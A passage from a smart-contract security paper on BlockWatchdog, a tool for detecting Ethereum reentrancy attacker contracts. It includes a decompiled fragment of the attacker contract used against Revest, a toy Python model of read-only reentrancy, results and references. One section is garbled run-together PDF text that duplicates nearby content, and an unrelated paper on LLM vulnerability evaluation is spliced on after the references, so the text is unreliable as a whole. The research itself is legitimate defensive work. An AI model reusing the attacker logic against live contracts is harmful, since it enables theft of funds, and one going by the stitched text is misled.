4      v39 = stor_18_0_19.withdrawFNFT(v36, 1 + v2[0]); }
5
6  function onERC1155Received(address varg0, address varg1, uint256 varg2, uint256 varg3, bytes varg4) public nonPayable {
7      ...
8      if (_onERC1155Received != 0) {
9          if (_onERC1155Received == 1) {
10             v0 = 0x2007(_onERC1155Received);
11             _onERC1155Received = v0;
12             v1, v2 = stor_19_0_19.getNextId();
13             v3, v4 = stor_18_0_19.depositAdditionalToFNFT(v2 - 1, stor_4, 1); }
14     } else {
15         v5 = 0x2007(_onERC1155Received);
16         _onERC1155Received = v5; }
17     return 0xf23a6e61; }

Figure 7: The attacker contract that hacked Revest.

It takes BlockWatchdog 64 seconds to identify this attacker contract and its victim contract. The time gap of half an hour between the deployment of the attacker contract and the actual attack far exceeds the time cost of the detection process. This provides an opportunity for whitehats to front-run the hackers and protect the vulnerable deployed contracts. Specifically, whitehats can copy the bytecode of the attacker contract to perform an imitation attack [38] before the real attack is launched; the intended profits of the hackers are then extracted by whitehats, thus saving possible financial losses. In addition, BlockWatchdog takes 25 seconds to detect the attacker contract shown in Figure 1 and the potentially exploitable victim in Visor Finance [19]. Since that attack occurred about 6 minutes after the deployment of the attacker contract, the protection can be performed in this time gap.

The above case study shows the practicality of timely protection using BlockWatchdog. In the blockchain system, attacks are irreversible, making it critical to detect potentially threatening contracts before the start of any transaction. BlockWatchdog can quickly identify such contracts, thereby improving the security of the Ethereum ecosystem in two ways.
(L12))anddepositedanotheroneviathefunctiondepositAddition- facilitatesearlydetectionandprovidesanopportunityforrapid alFNFT()(L13).Finally,anotherNFTwassuccessfullymintedto response,weconsciouslydonotperformon-chainfrontrunning theattackerwithoutbeingpaidinthisreentrancyattack.Ittakes thatcouldbedeemedasethicalissuesorpotentialdisruptivenessto BlockWatchdog64secondstoidentifythisattackercontractandits theblockchain’sintegrity.Furthermore,weusetransactionreplay victimcontract.Thetimegapofhalfanhourbetweenthedeploy- onlytoretrievethebytecodeofthedeployedsmartcontracts. mentoftheattackercontractandtheactualattackfarexceedsthe Secondly,ourtoolcanfindnewtypesofreentrancyvulnera- timecostsofthedetectionprocess.Thisprovidesanopportunity bilitiesthatothertoolsmayhavemissed.Securityfirmscanuse forwhitehatstofront-runthehackersandprotectthevulnerable BlockWatchdogtoidentifyundiscoveredattackercontractsand deployedcontracts.Specifically,whitehatscancopythebytecodeof reentrancyvulnerabilitiesinpractice.PlatformslikeEtherscanla- theattackercontracttoperformtheimitationattack[38]beforethe bel the attacker’s EOA as an attacker account, and warn about realattackislaunched.Therefore,theintendedprofitsofhackers newlydeployedcontractsandrelatedtransactions.ICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang Forcontractdevelopers,topreventtheircontractsfrombeing conditionalcheckswhentracingpaths,whichyieldsfalsepositives. attackedafterthedeployment,theexternalcalltargetcontract’sad- Third,wesummarizetheattacktypesanddesignthedetectionrules dressshouldbeverifiedin“sensitive”functions,e.g.,tokentransfer basedonthereportedattackincidents.Therefore,itispossiblethat orswaplogic,thusblockingthepremeditatedattacksthatmalicious wemaynotcovernewattacktypesthathavenotyetoccurredor attackercontractscouldlaunch. beenreported.Overall,despitetheabovelimitations,wefocuson detectingnewtypesofreentrancyvulnerabilitiesthatothertools cannotcover.Othertypesofattacksthatinvolveattackercontracts 6.2 CapabilityofFindingVulnerabilities mentionedinSection3arenotaddressedinthispaper,whichwe BlockWatchdogfindsasignificantnumberofexploitablevictim willcoverinfuturework. contractswithexploitablevulnerabilities,andmostofthemcannot bedetectedbycurrenttools.Wechoosesevenreentrancydetec- tiontoolstodetectvictimcontracts:Mythril[30],NFTGuard[57], 6.4 ThreatstoValidity Oyente[28],Sailfish[39],Securify1[48],Securify2[42],andSmar- Regardingourexperiment,themanuallabelingprocessmayhave tian[7],referringtothefourselectrules[57,60],i.e.,(1)availability introducederrorsindifferentiatingfalsepositivesandtruepositives. ofthetoolsourcecode;(2)usabilityofthecommand-lineinterface However,wehaveusedadouble-checkprocesstomitigatethis forlarge-scaleexperiment;(3)supportingSoliditysourcecode;(4) issueandupdatedthelabeleddatasetinatimelymannertoensure abilitytoreportvulnerablecodelocationformanualexamination. accuracy.WevalidatedwhethertherewasanattackonEtherscan Weruntheseseventoolson159victimcontracts,andalloutputs using the call chains reported by BlockWatchdog, collaborated aregiveninouropenrepository. 
The results show that only Mythril and Sailfish report 1 and 17 victims, respectively, while the other five tools do not report any reentrancy vulnerability. Therefore, only 18 out of 159 (11.3%) victims can be detected by current tools. As BlockWatchdog extracts more features from attacker contracts, which may be missed by other works, it can more effectively identify exploitable contracts with reentrancy vulnerabilities in practice, with better performance and generalizability. There are three reasons for these results. First, many identified attacker contracts extract tokens, but not Ethers, from victims, whereas most existing tools focus on call.value(), which only involves Ether transfers. Second, rule-based methods struggle to cover issues caused by patterns that have not been previously reported, and it is even harder to identify reentrancies related to user-defined interfaces that cannot be generalized into a detection pattern. Third, existing tools detect reentrancy based on state modification inconsistency. However, new reentrancy attacks, e.g., read-only reentrancy, can make use of just view functions, e.g., balanceOf() and getPrice(), to implement reentrancy. These view functions do not modify any state and are usually not protected, which makes such attacks difficult for existing tools to detect.
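To make the third reason concrete, the following toy Python model (our simplification, not the paper's code and not real EVM semantics) shows how a read-only reentrancy lets a callback observe a stale price from a view-like function:

    # Toy model of read-only reentrancy: get_price() modifies no state, yet a
    # callback fired mid-withdrawal observes an inconsistent price.
    class Vault:
        def __init__(self):
            self.eth = 100.0      # pooled Ether backing the shares
            self.shares = 100.0   # total shares issued

        def get_price(self):      # "view" function, analogous to getPrice()
            return self.eth / self.shares

        def withdraw(self, amount, callback):
            self.eth -= amount * self.get_price()  # Ether leaves first ...
            callback()                             # ... control handed to the caller ...
            self.shares -= amount                  # ... shares burned too late

    vault = Vault()
    seen = []
    vault.withdraw(50, callback=lambda: seen.append(vault.get_price()))
    print(seen[0], vault.get_price())  # 0.5 during re-entry vs. 1.0 afterwards

A protocol that prices collateral through such a view function during the callback would act on the skewed value, which is why checks based only on state modification miss this pattern.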
6.3 Limitations
Despite the strengths of BlockWatchdog, we identify three potential limitations. First, BlockWatchdog reports whether an input contract is an attacker contract based solely on static analysis, without transaction information. We can recover the possible call chains of the input contract, including transaction data, which can help enhance the precision of detection; as we aim to deploy BlockWatchdog as a real-time detection platform for Ethereum in the future, transactions are considered as additional information to achieve a more precise detection result. Second, we identify interacted contracts from constant addresses or storage, and by default we rely on the assumption that the attacker contract hardcodes the victims' addresses. Although we find that all the collected cases belong to these two scenarios, it is possible for attacker contracts to set the target contract in the arguments of a function, which we cannot obtain through static analysis, thus leading to false negatives. In addition, our taint analysis does not account for conditional checks when tracing paths, which yields false positives. Third, we summarize the attack types and design the detection rules based on the reported attack incidents. Therefore, it is possible that we may not cover new attack types that have not yet occurred or been reported. Overall, despite the above limitations, we focus on detecting new types of reentrancy vulnerabilities that other tools cannot cover. Other types of attacks that involve attacker contracts, mentioned in Section 3, are not addressed in this paper; we will cover them in future work.

6.4 Threats to Validity
Regarding our experiment, the manual labeling process may have introduced errors in differentiating false positives from true positives. However, we used a double-check process to mitigate this issue and updated the labeled dataset in a timely manner to ensure accuracy. We validated whether there was an attack on Etherscan using the call chains reported by BlockWatchdog, corroborated them with the transaction traces recorded on the online transaction trace explorer Phalcon [36], and recorded the financial loss according to the transaction information obtained from Etherscan. Another threat to validity is that we did not verify that the vulnerable contracts can actually be exploited, due to ethical concerns about attacking them. We intend to address this in our future work.
There are some other types of attacker contracts, e.g., Bad Randomness and Flashloan, as we mention in Section 3.2, which are not covered by this work. The design of BlockWatchdog focuses on call flow analysis, which makes it possible to extend it to detect Flashloan attacker contracts, which also contain some flow features. However, more contract semantics and operational features should be analyzed to cover other attacker contract types like Bad Randomness, which requires understanding specific contract behaviors.
Despite the limitations mentioned above, BlockWatchdog has detected 40 previously unreported zero-day attacker smart contracts with reentrancy features. Since BlockWatchdog does not require transaction information and can provide detection results within minutes, it can monitor newly deployed contracts and detect attacker contracts before they execute attacks, preventing potential attacks and heavy financial losses.

7 RELATED WORK
Reentrancy detection tools for smart contracts. As reentrancy is one of the notorious vulnerabilities in smart contracts [41], many program analysis tools have been developed to detect such issues by static analysis or dynamic testing [4-6]. The goal of these tools is to prevent vulnerable contracts from being deployed on the blockchain. For example, Oyente [28], Securify [48], Mythril [30], and Sailfish [39] use static analysis technologies to discover reentrancy vulnerabilities. In addition, there are dynamic testing and analysis tools such as ContractFuzzer [20], sFuzz [31], Smartian [7], RLF [44], and ReGuard [27], as well as approaches based on machine learning like ReVulDL [58]. As contract code and vulnerabilities become more complex, some works focus on cross-contract analysis, such as Clairvoyance [56] and SmartDagger [26]. However, many of these tools suffer from high false positive rates and may not identify real vulnerable contracts in practice [35].
To our knowledge, BlockWatchdog is the first detection tool to identify attacker contracts and their call chains. This feature enables the tool to detect real vulnerable victim contracts in practice. Additionally, BlockWatchdog addresses the limitation of current reentrancy detection capability [60] and can detect complex reentrancy attacks in the wild.
Security analysis of attack incidents on Ethereum. Prior research on attack analysis on Ethereum has focused on understanding attack incidents at the transaction level. For example, Torres et al. [47] conducted an empirical study of front-running attacks on Ethereum, while Zhou et al. [61] evaluated real-world attacks and defenses in the Ethereum ecosystem; they analyzed how attackers have destroyed applications on Ethereum and discussed how to defend against attacks from the victim contract's perspective. Su et al. [45] focused on DApp security and analyzed related transactions to understand how to detect attacks through transaction analysis; they developed a tool called DEFIER that can identify the stage of a potential attack. In contrast, BlockWatchdog can detect attacker contracts without any attack transactions, making it possible to prevent financial loss.

8 CONCLUSION AND FUTURE WORK
In this paper, we present BlockWatchdog, a tool for detecting reentrancy attacker contracts and identifying vulnerable victims with reentrancy vulnerabilities. To reduce false positives, we use the detection of attacker contracts as an entry point and identify vulnerable victim contracts based on the callback flow. To design BlockWatchdog, we conducted an empirical study to understand the attack logic used by hackers in attacker contracts. BlockWatchdog disassembles a contract's bytecode and monitors all potential call chains that initiate from its public functions and extend to accessible contracts and functions. Besides, BlockWatchdog formulates the xCFG and xCG to facilitate cross-contract data flow analysis across different procedures and to determine whether the callback flow can be exploited by malicious contracts to execute a successful reentrancy attack. Our experimental results demonstrate that BlockWatchdog effectively detects 113 attacker contracts among 421,889 real-world contracts and identifies 159 victim contracts with reentrancy vulnerabilities. These vulnerable contracts contain Ethers and tokens worth approximately 908.6 million USD; only 18 of them are identified by other detection tools.
Furthermore, we reveal all potential call chains of the 421,889 real-world contracts and whether they contain external calls in hook functions identified by BlockWatchdog. The detection results can be helpful for further security analysis. In the future, we plan to deploy BlockWatchdog for real-time detection, in order to find more vulnerable contracts in practice and help prevent them from being attacked. In addition, we will extend BlockWatchdog to cover new types of attacks, remaining effective in the face of ever-evolving threats on Ethereum.

ACKNOWLEDGMENTS
This research/project is supported by the National Key R&D Program of China (2022YFB2702203), the National Natural Science Foundation of China (No. 62302534 and No. 62332004), and the Ant Group Research Fund.

REFERENCES
[1] 2022. Hacker drains $1.4 million worth of ETH from NFT lender Omni. https://www.theblock.co/post/156800/hacker-drains-1-4-million-worth-of-eth-from-nft-lender-omni
[2] 2022. Medium - Where good ideas find you. https://medium.com/
[3] 2023. Alchemy. https://www.alchemy.com/
[4] Earl T. Barr, Mark Harman, Phil McMinn, Muzammil Shahbaz, and Shin Yoo. 2015. The Oracle Problem in Software Testing: A Survey. IEEE Transactions on Software Engineering 41, 5 (2015), 507-525. https://doi.org/10.1109/TSE.2014.2372785
[5] Antonia Bertolino. 2007. Software testing research: Achievements, challenges, dreams. In Future of Software Engineering (FOSE '07). IEEE, 85-103.
[6] Cristian Cadar, Daniel Dunbar, Dawson R. Engler, et al. 2008. KLEE: Unassisted and automatic generation of high-coverage tests for complex systems programs. In OSDI, Vol. 8. 209-224.
[7] Jaeseung Choi, Doyeon Kim, Soomin Kim, Gustavo Grieco, Alex Groce, and Sang Kil Cha. 2021. Smartian: Enhancing smart contract fuzzing with static and dynamic data-flow analyses. In 2021 36th IEEE/ACM International Conference on Automated Software Engineering (ASE). IEEE, 227-239.
[8] 2023. Consensys. https://consensys.net/
[9] 2023. C.R.E.A.M. Finance. https://docs.cream.finance/
[10] 2023. Ethereum Improvement Proposals. https://eips.ethereum.org/
[11] 2023. EIP-55. https://eips.ethereum.org/EIPS/eip-55
[12] 2023. ERC-3156: Flash Loans. https://eips.ethereum.org/EIPS/eip-3156
[13] 2023. ERC-1155 Multi-Token Standard. https://ethereum.org/en/developers/docs/standards/tokens/erc-1155/
[14] 2022. ERC-777 Token Standard. https://ethereum.org/en/developers/docs/standards/tokens/erc-777/
[15] 2023. Etherscan - The Ethereum Blockchain Explorer. https://etherscan.io/
[16] Neville Grech, Michael Kong, Anton Jurisevic, Lexi Brent, Bernhard Scholz, and Yannis Smaragdakis. 2018. MadMax: Surviving out-of-gas conditions in Ethereum smart contracts. Proceedings of the ACM on Programming Languages 2, OOPSLA (2018), 1-27.
[17] Neville Grech, Sifis Lagouvardos, Ilias Tsatiris, and Yannis Smaragdakis. 2022. Elipmoc: Advanced decompilation of Ethereum smart contracts. Proceedings of the ACM on Programming Languages 6, OOPSLA1 (2022), 1-27.
[18] 2018. EIP-721: Non-Fungible Token Standard. https://eips.ethereum.org/EIPS/eip-721
[19] 2021. Visor Finance Suffers another DeFi Hack as Losses Mount Up to $8.2M. https://www.fxempire.com/news/article/defi-protocols-have-lost-680-million-so-far-in-2021-795829
[20] Bo Jiang, Ye Liu, and Wing Kwong Chan. 2018. ContractFuzzer: Fuzzing smart contracts for vulnerability detection. In 2018 33rd IEEE/ACM International Conference on Automated Software Engineering (ASE). IEEE, 259-269.
[21] Sukrit Kalra, Seep Goel, Mohan Dhawan, and Subodh Sharma. 2018. ZEUS: Analyzing safety of smart contracts. In NDSS. 1-12.
[22] Queping Kong, Jiachi Chen, Yanlin Wang, Zigui Jiang, and Zibin Zheng. 2023. DeFiTainter: Detecting Price Manipulation Vulnerabilities in DeFi Protocols. In Proceedings of the 32nd ACM SIGSOFT International Symposium on Software Testing and Analysis. 1144-1156.
[23] Johannes Krupp and Christian Rossow. 2018. teEther: Gnawing at Ethereum to automatically exploit smart contracts. In 27th USENIX Security Symposium (USENIX Security 18). 1317-1333.
[24] 2020. About Recent Uniswap and Lendf.Me Reentrancy Attacks. https://medium.com/imtoken/about-recent-uniswap-and-lendf-me-reentrancy-attacks-7cebe834cb3
[25] Xiaoqi Li, Peng Jiang, Ting Chen, Xiapu Luo, and Qiaoyan Wen. 2020. A survey on the security of blockchain systems. Future Generation Computer Systems 107 (2020), 841-853.
[26] Zeqin Liao, Zibin Zheng, Xiao Chen, and Yuhong Nan. 2022. SmartDagger: A bytecode-based static analysis approach for detecting cross-contract vulnerability. In Proceedings of the 31st ACM SIGSOFT International Symposium on Software Testing and Analysis. 752-764.
[27] Chao Liu, Han Liu, Zhao Cao, Zhong Chen, Bangdao Chen, and Bill Roscoe. 2018. ReGuard: Finding reentrancy bugs in smart contracts. In Proceedings of the 40th International Conference on Software Engineering: Companion Proceedings. 65-68.
[28] Loi Luu, Duc-Hiep Chu, Hrishi Olickel, Prateek Saxena, and Aquinas Hobor. 2016. Making smart contracts smarter. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. 254-269.
[29] Bernhard Mueller. 2018. Smashing Ethereum smart contracts for fun and real profit. HITB SECCONF Amsterdam 9 (2018), 54.
[30] 2023. Mythril. https://mythril-classic.readthedocs.io/en/master/module-list.html
[31] Tai D. Nguyen, Long H. Pham, Jun Sun, Yun Lin, and Quang Tran Minh. 2020. sFuzz: An efficient adaptive fuzzer for Solidity smart contracts. In Proceedings of the ACM/IEEE 42nd International Conference on Software Engineering. 778-788.
[32] Ivica Nikolić, Aashish Kolluri, Ilya Sergey, Prateek Saxena, and Aquinas Hobor. 2018. Finding the greedy, prodigal, and suicidal contracts at scale. In Proceedings of the 34th Annual Computer Security Applications Conference. 653-663.
[33] Robert Norvill, Beltran Fiz, Radu State, and Andrea Cullen. 2019. Standardising smart contracts: Automatically inferring ERC standards. In 2019 IEEE International Conference on Blockchain and Cryptocurrency (ICBC). IEEE, 192-195.
[34] 2023. PeckShield - Industry Leading Blockchain Security Company. https://peckshield.com/
[35] Daniel Perez and Benjamin Livshits. 2021. Smart Contract Vulnerabilities: Vulnerable Does Not Imply Exploited. In USENIX Security Symposium. 1325-1341.
[36] 2023. Phalcon: Powerful Transaction Explorer Designed For the DeFi Community. https://explorer.phalcon.xyz/
[37] 2023. Whitehack by Primitive Finance: MOST FUNDS ARE SAFE. User action required. https://primitivefinance.medium.com/whitehack-by-primitive-finance-most-funds-are-safe-user-action-required-4dd31c387b8
[38] Kaihua Qin, Stefanos Chaliasos, Liyi Zhou, Benjamin Livshits, Dawn Song, and Arthur Gervais. 2023. The blockchain imitation game. arXiv preprint arXiv:2303.17877 (2023).
[39] Sriram Rao, Raghu Ramakrishnan, Adam Silberstein, Mike Ovsiannikov, and Damian Reeves. 2012. Sailfish: A framework for large scale data processing. In Proceedings of the Third ACM Symposium on Cloud Computing. 1-14.
[40] 2022. Revest Finance Vulnerabilities: More than Re-entrancy. https://blocksecteam.medium.com/revest-finance-vulnerabilities-more-than-re-entrancy-1609957b742f
[41] Michael Rodler, Wenting Li, Ghassan O. Karame, and Lucas Davi. 2018. Sereum: Protecting existing smart contracts against re-entrancy attacks. arXiv preprint arXiv:1812.05934 (2018).
[42] 2023. Securify 2.0. https://github.com/eth-sri/securify2
[43] Donna Spencer. 2009. Card Sorting: Designing Usable Categories. Rosenfeld Media.
[44] Jianzhong Su, Hong-Ning Dai, Lingjun Zhao, Zibin Zheng, and Xiapu Luo. 2022. Effectively generating vulnerable transaction sequences in smart contracts with reinforcement learning-guided fuzzing. In Proceedings of the 37th IEEE/ACM International Conference on Automated Software Engineering. 1-12.
[45] Liya Su, Xinyue Shen, Xiangyu Du, Xiaojing Liao, XiaoFeng Wang, Luyi Xing, and Baoxu Liu. 2021. Evil under the sun: Understanding and discovering attacks on Ethereum decentralized applications. In 30th USENIX Security Symposium (USENIX Security 21). 1307-1324.
[46] Nick Szabo. 1997. Formalizing and securing relationships on public networks. First Monday (1997).
[47] Christof Ferreira Torres, Ramiro Camino, and Radu State. 2021. Frontrunner Jones and the raiders of the dark forest: An empirical study of frontrunning on the Ethereum blockchain. arXiv preprint arXiv:2102.03347 (2021).
[48] Petar Tsankov, Andrei Dan, Dana Drachsler-Cohen, Arthur Gervais, Florian Buenzli, and Martin Vechev. 2018. Securify: Practical security analysis of smart contracts. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security. 67-82.
[49] 2023. Twitter. https://twitter.com/
[50] 2023. UniswapV2. https://github.com/Uniswap/v2-core/blob/master/contracts/UniswapV2Pair.sol
[51] 2023. The Uniswap V3 Smart Contracts. https://docs.uniswap.org/contracts/v3/overvie
[52] 2023. web3.py. https://web3py.readthedocs.io/en/stable/web3.eth.html
[53] Sam Werner, Daniel Perez, Lewis Gudgeon, Ariah Klages-Mundt, Dominik Harz, and William Knottenbelt. 2022. SoK: Decentralized finance (DeFi). In Proceedings of the 4th ACM Conference on Advances in Financial Technologies. 30-46.
[54] 2022. Why White Hat Hackers Are Vital to the Crypto Ecosystem. https://www.coindesk.com/layer2/2022/02/23/why-white-hat-hackers-are-vital-to-the-crypto-ecosystem/
[55] Kaidong Wu. 2019. An empirical study of blockchain-based decentralized applications. arXiv preprint arXiv:1902.04969 (2019).
[56] Yinxing Xue, Mingliang Ma, Yun Lin, Yulei Sui, Jiaming Ye, and Tianyong Peng. 2020. Cross-contract static analysis for detecting practical reentrancy vulnerabilities in smart contracts. In Proceedings of the 35th IEEE/ACM International Conference on Automated Software Engineering. 1029-1040.
[57] Shuo Yang, Jiachi Chen, and Zibin Zheng. 2023. Definition and Detection of Defects in NFT Smart Contracts. In Proceedings of the 32nd ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA 2023). ACM, New York, NY, USA, 373-384. https://doi.org/10.1145/3597926.3598063
[58] Zhuo Zhang, Yan Lei, Meng Yan, Yue Yu, Jiachi Chen, Shangwen Wang, and Xiaoguang Mao. 2022. Reentrancy vulnerability detection and localization: A deep learning based two-phase approach. In Proceedings of the 37th IEEE/ACM International Conference on Automated Software Engineering. 1-13.
[59] Zibin Zheng, Shaoan Xie, Hong-Ning Dai, Weili Chen, Xiangping Chen, Jian Weng, and Muhammad Imran. 2020. An overview on smart contracts: Challenges, advances and platforms. Future Generation Computer Systems 105 (2020), 475-491.
[60] Zibin Zheng, Neng Zhang, Jianzhong Su, Zhijie Zhong, Mingxi Ye, and Jiachi Chen. 2023. Turn the Rudder: A Beacon of Reentrancy Detection for Smart Contracts on Ethereum. arXiv:2303.13770 [cs.SE].
[61] Shunfan Zhou, Zhemin Yang, Jie Xiang, Yinzhi Cao, Min Yang, and Yuan Zhang. 2020. An ever-evolving game: Evaluation of real-world attacks and defenses in the Ethereum ecosystem. In Proceedings of the 29th USENIX Conference on Security Symposium. 2793-2809.
Multitask-based Evaluation of Open-Source LLM on Software Vulnerability

Xin Yin, Chao Ni⋆, and Shaohua Wang

Abstract— This paper proposes a pipeline for quantitatively evaluating interactive Large Language Models (LLMs) using publicly available datasets. We carry out an extensive technical evaluation of LLMs using Big-Vul, covering four different common software vulnerability tasks. This evaluation assesses the multi-tasking capabilities of LLMs based on this dataset. We find that the existing state-of-the-art approaches and pre-trained Language Models (LMs) are generally superior to LLMs in software vulnerability detection. However, in software vulnerability assessment and location, certain LLMs (e.g., CodeLlama and WizardCoder) have demonstrated superior performance compared to pre-trained LMs, and providing more contextual information can enhance the vulnerability assessment capabilities of LLMs. Moreover, LLMs exhibit strong vulnerability description capabilities, but their tendency to produce excessive output significantly weakens their performance compared to pre-trained LMs. Overall, though LLMs perform well in some aspects, they still need improvement in understanding the subtle differences in code vulnerabilities and in the ability to describe vulnerabilities to fully realize their potential. Our evaluation pipeline provides valuable insights into the capabilities of LLMs in handling software vulnerabilities.

Index Terms—Software Vulnerability Analysis, Large Language Model.

1 INTRODUCTION
Software Vulnerabilities (SVs) can expose software systems to risk situations and eventually cause huge economic losses or even threaten people's lives. Therefore, handling software vulnerabilities is an important task for software quality assurance (SQA). Generally, there are many important software quality activities for software vulnerabilities, such as SV detection, SV assessment, SV location, and SV description. The relationship among these SQA activities is intricate and interdependent and is illustrated in Fig. 1. SV detection serves as the initial phase, employing various tools and techniques to identify potential vulnerabilities within the software. Once detected, the focus shifts to SV assessment, where the severity and potential impact of each vulnerability are meticulously evaluated. This critical evaluation informs the subsequent steps in the process. SV location follows the assessment, pinpointing the exact areas within the software's code or architecture where vulnerabilities exist. This step is crucial for precise remediation efforts and to prevent the recurrence of similar vulnerabilities in the future. The intricacies of SV location feed into the comprehensive SV description, which encapsulates detailed information about each vulnerability, including its origin, characteristics, and potential exploits. In essence, the synergy among SV detection, SV assessment, SV location, and SV description creates a robust pipeline for addressing software vulnerabilities comprehensively. This systematic approach not only enhances the overall quality of the software but also fortifies it against potential threats, thereby safeguarding against economic losses and potential harm to individuals. As a cornerstone of software quality assurance, the seamless integration of these activities underscores the importance of a proactive and thorough approach to managing software vulnerabilities in today's dynamic and interconnected digital landscape.

Fig. 1: The relationship among software vulnerability analysis activities (Source Code -> Vulnerability Detection (RQ-1) -> Vulnerability Assessment (RQ-2) -> Vulnerability Location (RQ-3) -> Vulnerability Description (RQ-4) -> LLM Output)

Recently, Large Language Models (LLMs) [1] have been widely adopted since the advances in Natural Language Processing (NLP), which enable LLMs to be well-trained with both billions of parameters and billions of training samples, consequently bringing a large performance improvement on the tasks adopted by LLMs.
LLMs can easily be used for a downstream task by being fine-tuned [2] or being prompted [3], since they are trained to be general and can capture different knowledge from various domain data. Fine-tuning is used to update model parameters for a particular downstream task by iterating the model on a specific dataset, while prompting can be used directly by providing natural language descriptions or a few examples of the downstream task. Compared to prompting, fine-tuning is expensive since it requires additional model training, and it has limited usage scenarios, especially in cases where sufficient training datasets are unavailable.

(Both Xin Yin and Chao Ni are with the State Key Laboratory of Blockchain and Data Security, Zhejiang University, Hangzhou, China. Chao Ni is also with Hangzhou High-Tech Zone (Binjiang) Blockchain and Data Security Research Institute, Hangzhou, China. E-mail: {xyin, chaoni}@zju.edu.cn. Shaohua Wang is with Central University of Finance and Economics, China. E-mail: davidshwang@ieee.org. Chao Ni is the corresponding author.)

Fig. 2: The capability comparison of LLMs with different parameter sizes on different software vulnerability tasks: (a) LLMs' performance on different software vulnerability tasks (* refers to the results under the fine-tuning setting); (b) the impacts of parameter sizes on LLMs' performance across different software vulnerability tasks.

LLMs have demonstrated remarkable language comprehension and generation capabilities, and have been able to perform well on a variety of natural language processing
tasks, such as text summarization [4]. Given the outstanding performance of LLMs, there is a growing focus on exploring their potential in software engineering tasks and seeking new opportunities to address them. Currently, as more and more LLMs designed for software engineering tasks are deployed [5]-[11], many research works have focused on the application of LLMs in the software engineering domain [12]-[16]. However, in the existing literature, while systematic reviews and surveys have been conducted on LLMs in areas such as generating high-quality code and high-coverage test cases [17], [18], a systematic review and evaluation of open-source LLMs in the field of software vulnerability is still missing.
In this paper, we focus on evaluating LLMs' performance on various software vulnerability (SV)-related tasks in few-shot and fine-tuning settings to obtain a basic, comprehensive, and better understanding of their multi-task ability, and we aim to answer the following research questions.
• RQ-1: How do LLMs perform on vulnerability detection? Software Vulnerabilities (SVs) can expose software systems to risk situations and consequently cause software function failure. Therefore, detecting these SVs is an important task for software quality assurance. We aim to explore the ability of LLMs on vulnerability detection as well as the performance difference compared with state-of-the-art approaches and pre-trained Language Models (LMs).
• RQ-2: How do LLMs perform on vulnerability assessment? In practice, due to the limitation of SQA resources [19], it is impossible to treat all detected SVs equally and fix all SVs simultaneously. Thus, it is necessary to prioritize the detected software vulnerabilities for better treatment. An effective solution to prioritize those SVs is to use one of the most widely known SV assessment frameworks, CVSS (Common Vulnerability Scoring System) [20], which characterizes SVs by considering three metric groups: Base, Temporal, and Environmental. The metrics in these groups can further be used as the criterion for selecting serious SVs to fix early. Therefore, we aim to explore the ability of LLMs to assess vulnerabilities and compare their performance with pre-trained LMs.
• RQ-3: How do LLMs perform on vulnerability location? Identifying the precise location of vulnerabilities in software systems is of critical importance for mitigating risks and improving software quality. The vulnerability location task involves pinpointing these weaknesses accurately and helps to narrow the scope for developers to fix problems. Therefore, we aim to investigate LLMs' capability in effectively identifying the precise location of vulnerabilities in software systems, alongside evaluating their performance against state-of-the-art approaches and pre-trained LMs.
• RQ-4: How do LLMs perform on vulnerability description? Understanding the intricacies of vulnerabilities in software systems plays a pivotal role in alleviating risks and bolstering software quality. The vulnerability description task focuses on conveying a detailed explanation of the identified issues in the source code and helps participants to better understand the risk as well as its impacts. Our goal is to evaluate LLMs' ability to effectively generate vulnerability descriptions within software systems and compare their performance with that of pre-trained LMs.
To extensively and comprehensively analyze the LLMs' ability, we use a large-scale dataset containing real-world project vulnerabilities (named Big-Vul [21]). We carefully design experiments to discover the findings by answering the four RQs; the takeaway findings are shown in Table 1. Eventually, we present the comparison of LLMs across the four software vulnerability tasks under different settings, as well as the impact of varying model sizes on performance, as depicted in Fig. 2(a) and Fig. 2(b). In summary, the key contributions of this paper include:
• We extensively evaluate the performance of LLMs on different software vulnerability tasks and conduct an extensive comparison among LLMs and learning-based approaches to software vulnerability.
• We design four RQs to comprehensively understand LLMs from different dimensions, and provide detailed results with examples.
• We release our replication package for further study [22].
2 BACKGROUND AND RELATED WORK
2.1 Large Language Model
Since the advancements in Natural Language Processing, Large Language Models (LLMs) [1] have seen widespread adoption due to their capacity to be effectively trained with billions of parameters and training samples, resulting in significant performance enhancements. LLMs can readily be applied to downstream tasks through either fine-tuning [2] or prompting [3]. Their versatility stems from being trained to possess a broad understanding, enabling them to capture diverse knowledge across various domains. Fine-tuning involves updating the model parameters specifically for a given downstream task through iterative training on a specific dataset. In contrast, prompting allows for direct utilization by providing natural language descriptions or a few examples of the downstream task. Compared to prompting, fine-tuning is resource-intensive, as it necessitates additional model training, and it is applicable in limited scenarios, particularly when adequate training datasets are unavailable.
LLMs are usually built on the transformer architecture [23] and can be classified into three types of architectures: encoder-only, encoder-decoder, and decoder-only. Encoder-only (e.g., CodeBERT [24], GraphCodeBERT [25], and UniXcoder [26]) and encoder-decoder (e.g., PLBART [27], CodeT5 [7], and CodeT5+ [8]) models are trained using the Masked Language Modeling (MLM) or Masked Span Prediction (MSP) objective, respectively, where a small portion (e.g., 15%) of the tokens are replaced with either masked tokens or masked span tokens, and the models are trained to recover the masked tokens. These models are trained as general ones on code-related data and are then fine-tuned for downstream tasks to achieve superior performance. Decoder-only models also attract a
small portion of attention; they are trained using the Causal Language Modeling objective to predict the probability of the next token given all previous tokens. GPT [2] and its variants are the most representative models, which brought large language models into practical usage.
Recently, the ChatGPT model has attracted the widest attention; it is the successor of the large language model InstructGPT [28], with a dialog interface, that is fine-tuned using the Reinforcement Learning with Human Feedback (RLHF) approach [28]-[30]. RLHF initially fine-tunes the base model using a small dataset of prompts as input and the desired output, typically human-written, to refine its performance. Subsequently, a reward model is trained on a larger set of prompts by sampling outputs generated by the fine-tuned model. These outputs are then re-ordered by human labelers to provide feedback for training the reward model. Reinforcement learning [31] is then used to calculate rewards for each generated output based on the reward model, updating the LLM parameters accordingly. With fine-tuning and alignment with human preferences, LLMs better understand input prompts and instructions, enhancing performance across various tasks [28], [32].
